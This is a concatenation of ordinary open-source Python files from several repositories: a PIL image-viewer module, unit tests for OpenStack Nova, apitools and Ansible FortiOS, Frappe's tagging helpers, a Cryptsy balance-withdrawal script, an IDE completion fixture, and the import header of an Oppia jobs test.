# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
paulormart/gae-project-skeleton-100
|
refs/heads/master
|
gae/lib/PIL/ImageShow.py
|
39
|
#
# The Python Imaging Library.
# $Id$
#
# im.show() drivers
#
# History:
# 2008-04-06 fl Created
#
# Copyright (c) Secret Labs AB 2008.
#
# See the README file for information on usage and redistribution.
#
import Image
import os, sys
_viewers = []
def register(viewer, order=1):
    """Register an image viewer.

    *viewer* may be a Viewer subclass (it is instantiated) or an instance.
    A positive *order* appends to the viewer list, a negative one prepends;
    an *order* of zero leaves the list untouched.
    """
    try:
        needs_instantiation = issubclass(viewer, Viewer)
    except TypeError:
        needs_instantiation = False  # viewer was already an instance
    if needs_instantiation:
        viewer = viewer()
    if order > 0:
        _viewers.append(viewer)
    elif order < 0:
        _viewers.insert(0, viewer)
##
# Displays a given image.
#
# @param image An image object.
# @param title Optional title. Not all viewers can display the title.
# @param **options Additional viewer options.
# @return True if a suitable viewer was found, false otherwise.
def show(image, title=None, **options):
    """Display *image* using the first registered viewer that accepts it.

    Returns 1 if some viewer displayed the image, 0 otherwise.  *title*
    and extra keyword options are forwarded to each viewer.
    """
    # any() short-circuits exactly like the original loop: viewers after
    # the first successful one are never invoked.
    displayed = any(
        viewer.show(image, title=title, **options) for viewer in _viewers)
    return 1 if displayed else 0
##
# Base class for viewers.
class Viewer:
    """Base class for image viewers: saves the image to a temporary file
    and shells out to a display command supplied by subclasses."""
    # main api
    def show(self, image, **options):
        # save temporary image to disk
        if image.mode[:4] == "I;16":
            # @PIL88 @PIL101
            # "I;16" isn't an 'official' mode, but we still want to
            # provide a simple way to show 16-bit images.
            base = "L"
            # FIXME: auto-contrast if max() > 255?
        else:
            base = Image.getmodebase(image.mode)
        # convert to a displayable mode ("1" bitmaps are shown as-is)
        if base != image.mode and image.mode != "1":
            image = image.convert(base)
        self.show_image(image, **options)
    # hook methods
    # format used when dumping the temp file; None means PGM/PPM
    format = None
    def get_format(self, image):
        # return format name, or None to save as PGM/PPM
        return self.format
    def get_command(self, file, **options):
        # subclasses must return the shell command that displays `file`
        raise NotImplementedError
    def save_image(self, image):
        # save to temporary file, and return filename
        return image._dump(format=self.get_format(image))
    def show_image(self, image, **options):
        # display given image
        return self.show_file(self.save_image(image), **options)
    def show_file(self, file, **options):
        # display given file
        os.system(self.get_command(file, **options))
        return 1
# --------------------------------------------------------------------
# Platform-specific viewer registration: exactly one branch runs at import
# time, so only viewers usable on the current OS are registered.
if sys.platform == "win32":
    class WindowsViewer(Viewer):
        format = "BMP"
        def get_command(self, file, **options):
            # "start /wait" blocks until the viewer exits, then the temp
            # file is deleted
            return "start /wait %s && del /f %s" % (file, file)
    register(WindowsViewer)
elif sys.platform == "darwin":
    class MacViewer(Viewer):
        format = "BMP"
        def get_command(self, file, **options):
            # on darwin open returns immediately resulting in the temp
            # file removal while app is opening
            command = "open -a /Applications/Preview.app"
            command = "(%s %s; sleep 20; rm -f %s)&" % (command, file, file)
            return command
    register(MacViewer)
else:
    # unixoids
    def which(executable):
        # minimal PATH lookup (this module predates shutil.which)
        path = os.environ.get("PATH")
        if not path:
            return None
        for dirname in path.split(os.pathsep):
            filename = os.path.join(dirname, executable)
            if os.path.isfile(filename):
                # FIXME: make sure it's executable
                return filename
        return None
    class UnixViewer(Viewer):
        def show_file(self, file, **options):
            command, executable = self.get_command_ex(file, **options)
            # run in a background subshell and clean up the temp file after
            command = "(%s %s; rm -f %s)&" % (command, file, file)
            os.system(command)
            return 1
    # implementations
    class DisplayViewer(UnixViewer):
        def get_command_ex(self, file, **options):
            command = executable = "display"
            return command, executable
    if which("display"):
        register(DisplayViewer)
    class XVViewer(UnixViewer):
        def get_command_ex(self, file, title=None, **options):
            # note: xv is pretty outdated. most modern systems have
            # imagemagick's display command instead.
            command = executable = "xv"
            if title:
                # FIXME: do full escaping
                command = command + " -name \"%s\"" % title
            return command, executable
    if which("xv"):
        register(XVViewer)
if __name__ == "__main__":
    # usage: python ImageShow.py imagefile [title]
    # (Python 2 print statement -- this module predates print_function)
    print show(Image.open(sys.argv[1]), *sys.argv[2:])
|
viggates/nova
|
refs/heads/master
|
nova/tests/api/openstack/compute/plugins/v3/test_consoles.py
|
27
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid as stdlib_uuid
import webob
from nova.api.openstack.compute.plugins.v3 import consoles
from nova.compute import vm_states
from nova import console
from nova import db
from nova import exception
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import matchers
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
class FakeInstanceDB(object):
    """In-memory stand-in for the instance DB tables used by these tests."""
    def __init__(self):
        self.instances_by_id = {}
        self.ids_by_uuid = {}
        self.max_id = 0
    def return_server_by_id(self, context, id):
        # auto-create the instance on first lookup so tests need no fixtures
        if id not in self.instances_by_id:
            self._add_server(id=id)
        return dict(self.instances_by_id[id])
    def return_server_by_uuid(self, context, uuid):
        if uuid not in self.ids_by_uuid:
            self._add_server(uuid=uuid)
        return dict(self.instances_by_id[self.ids_by_uuid[uuid]])
    def _add_server(self, id=None, uuid=None):
        # fill in whichever identifier is missing, keeping max_id correct
        if id is None:
            id = self.max_id + 1
        if uuid is None:
            uuid = str(stdlib_uuid.uuid4())
        instance = stub_instance(id, uuid=uuid)
        self.instances_by_id[id] = instance
        self.ids_by_uuid[uuid] = id
        if id > self.max_id:
            self.max_id = id
def stub_instance(id, user_id='fake', project_id='fake', host=None,
                  vm_state=None, task_state=None,
                  reservation_id="", uuid=FAKE_UUID, image_ref="10",
                  flavor_id="1", name=None, key_name='',
                  access_ipv4=None, access_ipv6=None, progress=0):
    """Build a plain-dict fake of an instance DB record for the tests."""
    if host is not None:
        host = str(host)
    if key_name:
        key_data = 'FAKE'
    else:
        key_data = ''
    # ReservationID isn't sent back, hack it in there.
    server_name = name or "server%s" % id
    if reservation_id != "":
        server_name = "reservation_%s" % (reservation_id, )
    instance = {
        "id": int(id),
        "created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
        "updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
        "admin_password": "",
        "user_id": user_id,
        "project_id": project_id,
        "image_ref": image_ref,
        "kernel_id": "",
        "ramdisk_id": "",
        "launch_index": 0,
        "key_name": key_name,
        "key_data": key_data,
        "vm_state": vm_state or vm_states.BUILDING,
        "task_state": task_state,
        "memory_mb": 0,
        "vcpus": 0,
        "root_gb": 0,
        "hostname": "",
        "host": host,
        "instance_type": {},
        "user_data": "",
        "reservation_id": reservation_id,
        "mac_address": "",
        "scheduled_at": timeutils.utcnow(),
        "launched_at": timeutils.utcnow(),
        "terminated_at": timeutils.utcnow(),
        "availability_zone": "",
        "display_name": server_name,
        "display_description": "",
        "locked": False,
        "metadata": [],
        "access_ip_v4": access_ipv4,
        "access_ip_v6": access_ipv6,
        "uuid": uuid,
        "progress": progress}
    return instance
class ConsolesControllerTest(test.NoDBTestCase):
    """Unit tests for the v3 consoles controller.

    Each test stubs the console API entry point it exercises and asserts
    either the serialized response or the HTTP error translation.
    """
    def setUp(self):
        super(ConsolesControllerTest, self).setUp()
        self.flags(verbose=True)
        # route DB instance lookups through the in-memory fake
        self.instance_db = FakeInstanceDB()
        self.stubs.Set(db, 'instance_get',
                       self.instance_db.return_server_by_id)
        self.stubs.Set(db, 'instance_get_by_uuid',
                       self.instance_db.return_server_by_uuid)
        self.uuid = str(stdlib_uuid.uuid4())
        self.url = '/v3/fake/servers/%s/consoles' % self.uuid
        self.controller = consoles.ConsolesController()
    def test_create_console(self):
        def fake_create_console(cons_self, context, instance_id):
            self.assertEqual(instance_id, self.uuid)
            return {}
        self.stubs.Set(console.api.API, 'create_console', fake_create_console)
        req = fakes.HTTPRequestV3.blank(self.url)
        self.controller.create(req, self.uuid, None)
        # v3 create is expected to respond 201 Created
        self.assertEqual(self.controller.create.wsgi_code, 201)
    def test_create_console_unknown_instance(self):
        def fake_create_console(cons_self, context, instance_id):
            raise exception.InstanceNotFound(instance_id=instance_id)
        self.stubs.Set(console.api.API, 'create_console', fake_create_console)
        req = fakes.HTTPRequestV3.blank(self.url)
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
                          req, self.uuid, None)
    def test_show_console(self):
        def fake_get_console(cons_self, context, instance_id, console_id):
            self.assertEqual(instance_id, self.uuid)
            self.assertEqual(console_id, 20)
            pool = dict(console_type='fake_type',
                    public_hostname='fake_hostname')
            return dict(id=console_id, password='fake_password',
                    port='fake_port', pool=pool, instance_name='inst-0001')
        # the pool's public_hostname/console_type are flattened into the view
        expected = {'console': {'id': 20,
                                'port': 'fake_port',
                                'host': 'fake_hostname',
                                'password': 'fake_password',
                                'instance_name': 'inst-0001',
                                'console_type': 'fake_type'}}
        self.stubs.Set(console.api.API, 'get_console', fake_get_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        res_dict = self.controller.show(req, self.uuid, '20')
        self.assertThat(res_dict, matchers.DictMatches(expected))
    def test_show_console_unknown_console(self):
        def fake_get_console(cons_self, context, instance_id, console_id):
            raise exception.ConsoleNotFound(console_id=console_id)
        self.stubs.Set(console.api.API, 'get_console', fake_get_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.show,
                          req, self.uuid, '20')
    def test_show_console_unknown_instance(self):
        def fake_get_console(cons_self, context, instance_id, console_id):
            raise exception.ConsoleNotFoundForInstance(
                instance_uuid=instance_id)
        self.stubs.Set(console.api.API, 'get_console', fake_get_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.show,
                          req, self.uuid, '20')
    def test_list_consoles(self):
        def fake_get_consoles(cons_self, context, instance_id):
            self.assertEqual(instance_id, self.uuid)
            pool1 = dict(console_type='fake_type',
                    public_hostname='fake_hostname')
            cons1 = dict(id=10, password='fake_password',
                    port='fake_port', pool=pool1)
            pool2 = dict(console_type='fake_type2',
                    public_hostname='fake_hostname2')
            cons2 = dict(id=11, password='fake_password2',
                    port='fake_port2', pool=pool2)
            return [cons1, cons2]
        # index view exposes only id and console_type per entry
        expected = {'consoles':
                [{'id': 10, 'console_type': 'fake_type'},
                 {'id': 11, 'console_type': 'fake_type2'}]}
        self.stubs.Set(console.api.API, 'get_consoles', fake_get_consoles)
        req = fakes.HTTPRequestV3.blank(self.url)
        res_dict = self.controller.index(req, self.uuid)
        self.assertThat(res_dict, matchers.DictMatches(expected))
    def test_list_consoles_unknown_instance(self):
        def fake_get_consoles(cons_self, context, instance_id):
            raise exception.InstanceNotFound(instance_id=instance_id)
        self.stubs.Set(console.api.API, 'get_consoles', fake_get_consoles)
        req = fakes.HTTPRequestV3.blank(self.url)
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.index,
                          req, self.uuid)
    def test_delete_console(self):
        def fake_get_console(cons_self, context, instance_id, console_id):
            self.assertEqual(instance_id, self.uuid)
            self.assertEqual(console_id, 20)
            pool = dict(console_type='fake_type',
                    public_hostname='fake_hostname')
            return dict(id=console_id, password='fake_password',
                    port='fake_port', pool=pool)
        def fake_delete_console(cons_self, context, instance_id, console_id):
            self.assertEqual(instance_id, self.uuid)
            self.assertEqual(console_id, 20)
        self.stubs.Set(console.api.API, 'get_console', fake_get_console)
        self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        self.controller.delete(req, self.uuid, '20')
    def test_delete_console_unknown_console(self):
        def fake_delete_console(cons_self, context, instance_id, console_id):
            raise exception.ConsoleNotFound(console_id=console_id)
        self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
                          req, self.uuid, '20')
    def test_delete_console_unknown_instance(self):
        def fake_delete_console(cons_self, context, instance_id, console_id):
            raise exception.ConsoleNotFoundForInstance(
                instance_uuid=instance_id)
        self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
        req = fakes.HTTPRequestV3.blank(self.url + '/20')
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
                          req, self.uuid, '20')
|
SummerLW/Perf-Insight-Report
|
refs/heads/test
|
third_party/gsutil/third_party/apitools/apitools/base/py/credentials_lib_test.py
|
11
|
import re
import mock
import six
from six.moves import http_client
import unittest2
from apitools.base.py import credentials_lib
from apitools.base.py import util
def CreateUriValidator(uri_regexp, content=''):
    """Return a mock URL-opener that validates metadata-server requests.

    The returned callable raises ValueError when the required metadata
    header is absent, and otherwise returns an (HttpResponse-like, body)
    pair: OK with *content* when the URI matches *uri_regexp*, else
    BAD_REQUEST with a diagnostic message.
    """
    def CheckUri(uri, headers=None):
        # Treat a missing headers mapping like a missing header: the
        # original `'...' not in headers` raised TypeError on the default
        # headers=None instead of the intended ValueError.
        if not headers or 'X-Google-Metadata-Request' not in headers:
            raise ValueError('Missing required header')
        if uri_regexp.match(uri):
            message = content
            status = http_client.OK
        else:
            message = 'Expected uri matching pattern %s' % uri_regexp.pattern
            status = http_client.BAD_REQUEST
        return type('HttpResponse', (object,), {'status': status})(), message
    return CheckUri
class CredentialsLibTest(unittest2.TestCase):
    """Exercise GceAssertionCredentials against a mocked metadata server."""
    def _GetServiceCreds(self, service_account_name=None, scopes=None):
        kwargs = {}
        if service_account_name is not None:
            kwargs['service_account_name'] = service_account_name
        service_account_name = service_account_name or 'default'
        def MockMetadataCalls(request_url):
            # answer the three metadata endpoints the credentials code hits:
            # scopes, service-accounts listing, and the token endpoint
            default_scopes = scopes or ['scope1']
            if request_url.endswith('scopes'):
                return six.StringIO(''.join(default_scopes))
            elif request_url.endswith('service-accounts'):
                return six.StringIO(service_account_name)
            elif request_url.endswith(
                    '/service-accounts/%s/token' % service_account_name):
                return six.StringIO('{"access_token": "token"}')
            self.fail('Unexpected HTTP request to %s' % request_url)
        with mock.patch.object(credentials_lib, '_GceMetadataRequest',
                               side_effect=MockMetadataCalls,
                               autospec=True) as opener_mock:
            with mock.patch.object(util, 'DetectGce',
                                   autospec=True) as mock_detect:
                mock_detect.return_value = True
                validator = CreateUriValidator(
                    re.compile(r'.*/%s/.*' % service_account_name),
                    content='{"access_token": "token"}')
                credentials = credentials_lib.GceAssertionCredentials(
                    scopes, **kwargs)
                self.assertIsNone(credentials._refresh(validator))
            # one request each for scopes, service-accounts and token
            self.assertEqual(3, opener_mock.call_count)
    def test_GceServiceAccounts(self):
        scopes = ['scope1']
        self._GetServiceCreds()
        self._GetServiceCreds(scopes=scopes)
        self._GetServiceCreds(service_account_name='my_service_account',
                              scopes=scopes)
class TestGetRunFlowFlags(unittest2.TestCase):
    """Check _GetRunFlowFlags both with and without gflags present."""
    def setUp(self):
        # remember the real FLAGS so each test can swap in its own
        self._flags_actual = credentials_lib.FLAGS
    def tearDown(self):
        credentials_lib.FLAGS = self._flags_actual
    def test_with_gflags(self):
        HOST = 'myhostname'
        PORT = '144169'
        class MockFlags(object):
            auth_host_name = HOST
            auth_host_port = PORT
            auth_local_webserver = False
        credentials_lib.FLAGS = MockFlags
        flags = credentials_lib._GetRunFlowFlags([
            '--auth_host_name=%s' % HOST,
            '--auth_host_port=%s' % PORT,
            '--noauth_local_webserver',
        ])
        self.assertEqual(flags.auth_host_name, HOST)
        self.assertEqual(flags.auth_host_port, PORT)
        self.assertEqual(flags.logging_level, 'ERROR')
        self.assertEqual(flags.noauth_local_webserver, True)
    def test_without_gflags(self):
        # with FLAGS unset the oauth2client argparse defaults are used
        credentials_lib.FLAGS = None
        flags = credentials_lib._GetRunFlowFlags([])
        self.assertEqual(flags.auth_host_name, 'localhost')
        self.assertEqual(flags.auth_host_port, [8080, 8090])
        self.assertEqual(flags.logging_level, 'ERROR')
        self.assertEqual(flags.noauth_local_webserver, False)
|
rohitw1991/frappe
|
refs/heads/develop
|
frappe/widgets/tags.py
|
36
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Server side functions for tagging.
- Tags can be added to any record (doctype, name) in the system.
- Items are filtered by tags
- Top tags are shown in the sidebar (?)
- Tags are also identified by the tag_fields property of the DocType
Discussion:
Tags are shown in the docbrowser and ideally where-ever items are searched.
There should also be statistics available for tags (like top tags etc)
Design:
- free tags (user_tags) are stored in __user_tags
- doctype tags are set in tag_fields property of the doctype
- top tags merges the tags from both the lists (only refreshes once an hour (max))
"""
import frappe
def check_user_tags(dt):
	"if the user does not have a tags column, then it creates one"
	# NOTE(review): dt is interpolated into the table name (`tab<DocType>`);
	# callers must pass a trusted DocType name — confirm no user input
	# reaches here unvalidated.
	try:
		frappe.db.sql("select `_user_tags` from `tab%s` limit 1" % dt)
	except Exception, e:
		# MySQL error 1054 = unknown column: create it on demand
		if e.args[0] == 1054:
			DocTags(dt).setup()
@frappe.whitelist()
def add_tag():
	"""Add a tag to a record identified by the request's (dt, dn).

	Reads `tag`, `dt` and `dn` from the request form dict and returns the
	tag so the client can update its UI.  The previously-read `color`
	parameter was never used and has been dropped.
	"""
	f = frappe.local.form_dict
	tag = f.get('tag')
	dt, dn = f.get('dt'), f.get('dn')
	DocTags(dt).add(dn, tag)
	return tag
@frappe.whitelist()
def remove_tag():
	"removes tag from the record"
	# request parameters: the tag text plus (doctype, name) of the record
	f = frappe.local.form_dict
	tag, dt, dn = f.get('tag'), f.get('dt'), f.get('dn')
	DocTags(dt).remove(dn, tag)
class DocTags:
	"""Tags for a particular doctype"""
	def __init__(self, dt):
		self.dt = dt
	def get_tag_fields(self):
		"""returns tag_fields property"""
		return frappe.db.get_value('DocType', self.dt, 'tag_fields')
	def get_tags(self, dn):
		"""returns tag for a particular item"""
		# ignore=1 suppresses the error if the column does not exist yet
		return (frappe.db.get_value(self.dt, dn, '_user_tags', ignore=1) or '').strip()
	def add(self, dn, tag):
		"""add a new user tag"""
		tl = self.get_tags(dn).split(',')
		if not tag in tl:
			tl.append(tag)
			self.update(dn, tl)
	def remove(self, dn, tag):
		"""remove a user tag"""
		tl = self.get_tags(dn).split(',')
		self.update(dn, filter(lambda x:x!=tag, tl))
	def remove_all(self, dn):
		"""remove all user tags (call before delete)"""
		self.update(dn, [])
	def update(self, dn, tl):
		"""updates the _user_tag column in the table"""
		if not tl:
			tags = ''
		else:
			# dedupe, drop empties, and keep a leading comma so every tag
			# can be matched with a LIKE '%,tag%' pattern
			tl = list(set(filter(lambda x: x, tl)))
			tags = ',' + ','.join(tl)
		try:
			frappe.db.sql("update `tab%s` set _user_tags=%s where name=%s" % \
				(self.dt,'%s','%s'), (tags , dn))
		except Exception, e:
			# 1054 = unknown column: create `_user_tags` and retry once
			if e.args[0]==1054:
				if not tags:
					# no tags, nothing to do
					return
				self.setup()
				self.update(dn, tl)
			else: raise
	def setup(self):
		"""adds the _user_tags column if not exists"""
		from frappe.model.db_schema import add_column
		add_column(self.dt, "_user_tags", "Data")
|
salfter/coinswitch
|
refs/heads/master
|
withdraw.py
|
2
|
#!/usr/bin/env python
# coding=iso-8859-1
# Cryptsy auto-withdraw cronjob
#
# Copyright © 2014 Scott Alfter
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# Flat cron-style script (Python 2): polls the Cryptsy BTC balance forever
# and withdraws the full balance to the configured address whenever it
# exceeds 0.01 BTC. Runs until killed; there is no error handling, so any
# API/network failure terminates the process (presumably restarted by a
# supervisor -- TODO confirm).
import sys
sys.path.insert(0, './PyCryptsy/')
from PyCryptsy import PyCryptsy
from decimal import *
import ConfigParser  # Python 2 module (renamed configparser in Python 3)
import pprint
import time

# API key/secret and the withdrawal address come from coinswitch.conf.
Config = ConfigParser.ConfigParser()
Config.read('./coinswitch.conf')
api=PyCryptsy(Config.get("Cryptsy", "key"), Config.get("Cryptsy", "secret"))
# 8 significant digits for Decimal arithmetic (satoshi precision).
getcontext().prec=8

while True:
    balance=Decimal(api.Query("getinfo", {})["return"]["balances_available"]["BTC"])
    print "balance: "+str(balance)+" BTC"
    # NOTE(review): Decimal-vs-float comparison; numerically correct on
    # Python 2.7+, but the 0.01 BTC threshold is hard-coded here rather
    # than read from the config file.
    if (balance>0.01):
        print "withdrawal triggered"
        pprint.pprint(api.Query("makewithdrawal", {"address": Config.get("Cryptsy", "addr"), "amount": balance}))
    # Poll interval (seconds) from the [Misc] section of the config.
    time.sleep(float(Config.get("Misc", "interval")))
|
gnuhub/intellij-community
|
refs/heads/master
|
python/testData/completion/mro.after.py
|
83
|
# IDE completion-test fixture: the expected buffer after completing
# `__mro__` on a new-style class.
# NOTE(review): completion "after" fixtures are usually compared textually
# by the test harness -- confirm comments are tolerated before keeping them.
class C(object):
    pass
C.__mro__
|
Lujeni/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_switch_controller_global.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_switch_controller_global
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    """Patch the module's Connection class for every test (autouse)."""
    connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_switch_controller_global.Connection')
    return connection_class_mock
# NOTE(review): this passes the fixture *function* object (not a mocked
# connection instance) to FortiOSHandler. The tests never exercise the
# connection directly because `set`/`schema` are patched per test, so it
# goes unnoticed -- verify against other generated fortios tests.
fos_instance = FortiOSHandler(connection_mock)
def test_switch_controller_global_creation(mocker):
    """Successful POST: module reports changed=True and no error."""
    schema_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'success', 'http_method': 'POST', 'http_status': 200})

    playbook_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_global': {
            'allow_multiple_interfaces': 'enable',
            'default_virtual_switch_vlan': 'test_value_4',
            'https_image_push': 'enable',
            'log_mac_limit_violations': 'enable',
            'mac_aging_interval': '7',
            'mac_retention_period': '8',
            'mac_violation_timer': '9'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(
        playbook_args, fos_instance)

    # Keys are translated from snake_case to the FortiOS dash style.
    set_mock.assert_called_with(
        'switch-controller', 'global',
        data={
            'allow-multiple-interfaces': 'enable',
            'default-virtual-switch-vlan': 'test_value_4',
            'https-image-push': 'enable',
            'log-mac-limit-violations': 'enable',
            'mac-aging-interval': '7',
            'mac-retention-period': '8',
            'mac-violation-timer': '9'
        },
        vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_switch_controller_global_creation_fails(mocker):
    """Failed POST (HTTP 500): module reports an error and no change."""
    schema_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'error', 'http_method': 'POST', 'http_status': 500})

    playbook_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_global': {
            'allow_multiple_interfaces': 'enable',
            'default_virtual_switch_vlan': 'test_value_4',
            'https_image_push': 'enable',
            'log_mac_limit_violations': 'enable',
            'mac_aging_interval': '7',
            'mac_retention_period': '8',
            'mac_violation_timer': '9'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(
        playbook_args, fos_instance)

    set_mock.assert_called_with(
        'switch-controller', 'global',
        data={
            'allow-multiple-interfaces': 'enable',
            'default-virtual-switch-vlan': 'test_value_4',
            'https-image-push': 'enable',
            'log-mac-limit-violations': 'enable',
            'mac-aging-interval': '7',
            'mac-retention-period': '8',
            'mac-violation-timer': '9'
        },
        vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_switch_controller_global_idempotent(mocker):
    """HTTP 404 on set: treated as 'already in desired state' (no change, no error)."""
    schema_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'error', 'http_method': 'DELETE', 'http_status': 404})

    playbook_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_global': {
            'allow_multiple_interfaces': 'enable',
            'default_virtual_switch_vlan': 'test_value_4',
            'https_image_push': 'enable',
            'log_mac_limit_violations': 'enable',
            'mac_aging_interval': '7',
            'mac_retention_period': '8',
            'mac_violation_timer': '9'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(
        playbook_args, fos_instance)

    set_mock.assert_called_with(
        'switch-controller', 'global',
        data={
            'allow-multiple-interfaces': 'enable',
            'default-virtual-switch-vlan': 'test_value_4',
            'https-image-push': 'enable',
            'log-mac-limit-violations': 'enable',
            'mac-aging-interval': '7',
            'mac-retention-period': '8',
            'mac-violation-timer': '9'
        },
        vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_switch_controller_global_filter_foreign_attributes(mocker):
    """Unknown input keys are stripped before the payload is sent."""
    schema_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'success', 'http_method': 'POST', 'http_status': 200})

    playbook_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_global': {
            'random_attribute_not_valid': 'tag',
            'allow_multiple_interfaces': 'enable',
            'default_virtual_switch_vlan': 'test_value_4',
            'https_image_push': 'enable',
            'log_mac_limit_violations': 'enable',
            'mac_aging_interval': '7',
            'mac_retention_period': '8',
            'mac_violation_timer': '9'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(
        playbook_args, fos_instance)

    # The foreign 'random_attribute_not_valid' key must not appear here.
    set_mock.assert_called_with(
        'switch-controller', 'global',
        data={
            'allow-multiple-interfaces': 'enable',
            'default-virtual-switch-vlan': 'test_value_4',
            'https-image-push': 'enable',
            'log-mac-limit-violations': 'enable',
            'mac-aging-interval': '7',
            'mac-retention-period': '8',
            'mac-violation-timer': '9'
        },
        vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
|
google-code-export/oppia
|
refs/heads/master
|
core/jobs_test.py
|
6
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for long running jobs and continuous computations."""
__author__ = 'Sean Lip'
import ast
from core import jobs
from core import jobs_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.platform import models
# Import the storage models and platform services through the platform
# registry so these tests stay platform-agnostic.
(base_models, exp_models, stats_models) = models.Registry.import_models([
    models.NAMES.base_model, models.NAMES.exploration, models.NAMES.statistics])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from core.tests import test_utils
import feconf
from google.appengine.ext import ndb

